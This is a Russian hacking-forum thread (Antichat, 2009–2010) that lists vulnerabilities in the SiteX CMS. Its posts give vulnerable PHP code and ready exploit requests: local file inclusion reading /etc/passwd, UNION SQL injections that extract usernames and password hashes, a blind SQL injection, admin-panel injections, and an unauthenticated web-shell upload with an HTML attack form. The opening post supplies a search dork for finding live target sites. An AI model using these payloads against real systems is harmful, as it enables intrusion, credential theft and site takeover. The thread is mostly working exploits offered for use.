Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |

15.04.2009, 12:56
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме: 7561206
Репутация:
1861
|
|
Обзор Уязвимостей SiteX
Уязвимости SiteX 0.7 Beta
download: http://jaist.dl.sourceforge.net/sourceforge/sitex/SiteX_074_build_418.zip
dork: "Powered by SiteX 0.7 Beta"
(выдачу гугла больше 10 линков не ставьте )
1) [LFI] (требования: magic_quotes=off, register_globals=on)
/themes/Corporate/homepage.php
уязвимый код:
PHP код:
include("themes/$THEME_FOLDER/header.php");
эксплуатирование:
Код:
/themes/Corporate/homepage.php?THEME_FOLDER=../../../../../../../../etc/passwd%00
2) [SQL-injection] (требования: magic_quotes=off, register_globals=on)
links.php
уязвимый код:
PHP код:
if($category)
{
$query = "SELECT * FROM $DB_Links_Groups WHERE id='$category'";
$result = mysql_query($query, $Link) or queryError("8", mysql_error());
эксплуатирование:
Код:
/links.php?category=-1'+union+select+1,concat_ws(0x3a,username,password),3+from+sitex_users--+
P.S:
шелл в админке аплоадится без проблем
Последний раз редактировалось Iceangel_; 15.04.2009 в 13:23..
|
|
|

15.04.2009, 13:44
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме: 7452489
Репутация:
1359
|
|
1) [LFI] требования: magic_quotes=off
не обязательно 
|
|
|

15.04.2009, 13:54
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме: 7561206
Репутация:
1861
|
|
2 geezer.code
не на всех сайтах получается реализовать, поэтому как требование поставил =)
|
|
|

25.02.2010, 18:26
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме: 3202832
Репутация:
1588
|
|
Уязвимости SiteX 0.7 Beta
Product : SiteX 0.7.4 build 405
PHPinfo
Код:
http://localhost/setup/phpinfo.php
LFI
PHP код:
include("themes/$THEME_FOLDER/header.php");
magic_quotes=off
register_globals=on
results :
Код:
http://localhost//themes/Fusion/homepage.php?THEME_FOLDER=../../../[...]%00
Код:
http://localhost//themes/Joombo/homepage.php?THEME_FOLDER=../../../[...]%00
Код:
http://localhost//themes/Streamline/homepage.php?THEME_FOLDER=../../../[...]%00
Код:
http://localhost//themes/Structure/homepage.php?THEME_FOLDER=../../../[...]%00
SQL Injection
magic_quotes=off, register_globals=on
photo.php
PHP код:
$query = "SELECT * FROM $DB_Photos WHERE id='$photoid'";
$result = mysql_query($query, $Link) or queryError("11", mysql_error());
$sxPhoto = mysql_fetch_object($result);
$sxNewViews = $sxPhoto->views + 1;
$sxQuery2 = "UPDATE $DB_Photos SET views='$sxNewViews' WHERE id='$photoid'";
$sxResult2 = mysql_query($sxQuery2, $Link) or queryError("10", mysql_error());
$queryA = "SELECT * FROM $DB_Photos_Albums WHERE id='$albumid'";
$resultA = mysql_query($queryA, $Link) or queryError("12", mysql_error());
$ROWA = mysql_fetch_object($resultA);
result :
Код:
http://localhost/photo.php?photoid=4&albumid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8--+
SQL injection in Admin Panel
magic_quotes=off, register_globals=on
admin/page_edit.php
PHP код:
$result = mysql_query($query, $Link) or queryError("38", mysql_error());
$query = "DELETE FROM $DB_Pages_Private WHERE pageid='$pageid'";
$result = mysql_query($query, $Link) or queryError("38", mysql_error());
if($private)
{
foreach ($user_types as $k => $v)
{
$query = "INSERT INTO $DB_Pages_Private (pageid, typeid) VALUES ('$pageid', '$k')";
$result = mysql_query($query, $Link) or queryError("38", mysql_error());
}
}
header("Location: ../page.php?pageid=$pageid&message=".str_replace(" ","_",$sxLang['MessagePageEdited']));
die();
}
$query = "SELECT * FROM $DB_Pages WHERE id='$pageid'";
result :
Код:
http://localhost/admin/page_edit.php?pageid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7--+
admin/journal_edit.php
PHP код:
$query = "UPDATE $DB_Journal SET title='$title', entry='$content', timestamp='$timestamp', month='$date_month', day='$date_day', year='$date_year' WHERE id='$entryid'";
$result = mysql_query($query, $Link) or queryError("21", mysql_error());
writeRSSXML();
header("Location: ../journal.php?sxEntryID=$entryid&message=".str_replace(" ","_",$sxLang['MessageJournalEdited']));
die();
//$message = $sxLang['MessageJournalEdited'];
}
$query = "SELECT * FROM $DB_Journal WHERE id='$entryid'";
$result = mysql_query($query, $Link) or queryError("21", mysql_error());
$ROW = mysql_fetch_object($result);
result :
Код:
http://localhost/admin/journal_edit.php?entryid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8--+
Последний раз редактировалось [x60]unu; 25.02.2010 в 18:45..
|
|
|

25.02.2010, 22:11
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме: 5290740
Репутация:
912
|
|
5 копеек..)
-------
1) SQL injection(требования: mq=off, любой акк)
file:/admin/profile_view.php
PHP код:
$query2 = "SELECT * FROM $DB_Users, $DB_Users_Assoc, $DB_Users_Types
WHERE $DB_Users.username='$user' AND
$DB_Users.id=$DB_Users_Assoc.userid AND
$DB_Users_Assoc.typeid=$DB_Users_Types.id";
$result2 = mysql_query($query2, $Link) or queryError("402", mysql_error());
result:
Код:
/admin/profile_view.php?user=-123456'+union+select+1,User(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+
2)blind SQL injection(требования: mq=off,желательно 5 ветка бд)
file: /forums_topic.php
PHP код:
$query = "SELECT * FROM $DB_Forums_Posts WHERE id='$topicid'";
$result = mysql_query($query, $Link) or queryError("71", mysql_error());
result:
Код:
/forums_topic.php?topicid=1'+and+(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)+--+
//много скуль..
Последний раз редактировалось .:[melkiy]:.; 25.02.2010 в 22:53..
|
|
|

26.03.2010, 05:23
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Внесу свой посильный вклад.
[Version 0.8.0 RC 3 build 524]
Заливка шела. Не требуеться ни прав, ни авторизации, ни чего то еще.
File: includes/uploadify/uploadify.php
PHP код:
if (!empty($_FILES)) {
$tempFile = $_FILES['Filedata']['tmp_name'];
$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
$targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];
// $fileTypes = str_replace('*.','',$_REQUEST['fileext']);
// $fileTypes = str_replace(';','|',$fileTypes);
// $typesArray = split('\|',$fileTypes);
// $fileParts = pathinfo($_FILES['Filedata']['name']);
// if (in_array($fileParts['extension'],$typesArray)) {
// Uncomment the following line if you want to make the directory if it doesn't exist
// mkdir(str_replace('//','/',$targetPath), 0755, true);
move_uploaded_file($tempFile,$targetFile);
echo "1";
// } else {
// echo 'Invalid file type.';
// }
}
Target:
Exploit ^_^
Код:
<form enctype="multipart/form-data" action="http://targethost.com/includes/uploadify/uploadify.php" method="post" >
<input type="file" name="Filedata" /><input type="submit" />
<input type="text" name="folder" />
</form>
Если же, начальник сайта, раскомментирует по дефолту закомментированые строчки, то допустимые расширения для файлов,можно будет передать в параметре fileext, записав туда .php
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|